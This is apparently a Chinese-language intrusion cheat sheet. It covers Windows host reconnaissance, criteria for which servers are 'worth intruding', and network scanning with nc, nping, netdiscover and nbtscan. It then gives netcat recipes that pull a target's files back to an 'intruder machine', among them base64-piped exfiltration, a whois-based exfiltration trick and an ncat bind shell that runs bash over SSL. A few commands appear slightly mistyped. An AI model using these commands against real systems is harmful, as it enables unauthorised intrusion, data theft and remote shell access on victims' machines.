信息搜集
本地信息搜集(Windows 命令)
whoami 查看自己身份
whoami /all 获取当前域的信息
ipconfig 获取ip地址信息
ipconfig /all 获取详细的ip地址信息
查询结果:[所在域-计算机名-账户名]
arp -a 查询arp表
echo %PROCESSOR_ARCHITECTURE% 查看CPU架构
systeminfo 查看操作系统信息
wmic product 查看安装的软件
wmic product get name,version 查看安装的软件和版本信息
net user 查看本地用户
net session 查看本地和远程的会话
net view 查看内网的共享情况
net share 查看自己共享了哪些东西
远程信息搜集(Kali 命令)
什么样的服务器有入侵价值?
- 有有价值的网站
seo.chinaz.com 查看seo信息,权重,ip访问量
- 上面有庞大数据库的服务器
mssql mysql oracle redis…
- 性能优秀的服务器
高性能CPU,显卡,硬盘
- 保有某些单位机密的服务器
nping --tcp -p 80 --flag syn 2 [目标ip]
测试对方端口是否开放
nc -nvz [目标ip] 1-65535
使用nc查看对方端口是否开放
netdiscover -i [网卡名称] -r 192.168.x.0/24
搜集内网用户的信息
arping [参数] [目标]
使用arp扫描
-i 指定网卡
-c 发包数量
-s 源mac
-S 源ip
nbtscan
使用 netbios 协议进行信息搜集(Windows之间使用)
通过计算机名解析对应ip
whatweb [网址]
初步分析网站结构
nc用法追加
文件传输(常规)
- 先启动发送
发送端:nc -l -p [端口号] <文件
接收端:nc [发送端ip] [端口号] >文件
- 先启动接收
接收端:nc -l -p [端口号] >文件
发送端:nc [发送端ip] [端口号] <文件
文本传输(加密)
目标机:
cat [目标文件] | base64 | nc -nv [入侵机ip] [端口号] -q 1
入侵机:
nc -l -p [端口号] >文件
文件传输(两台都是Linux且有一方没有nc)
目标机:
whois -h [入侵机ip] -p [端口号] cat [文件] | base64``
入侵机:
nc -l -v- p [端口号] | sed "s/ //g" | base64 -d
加密通信(两台都是Linux)
使用ncat
目标机:
ncat -c bash --all [入侵IP] -vnl [port] --ssl
入侵机:
ncats -nv [目标IP] [port] --ssl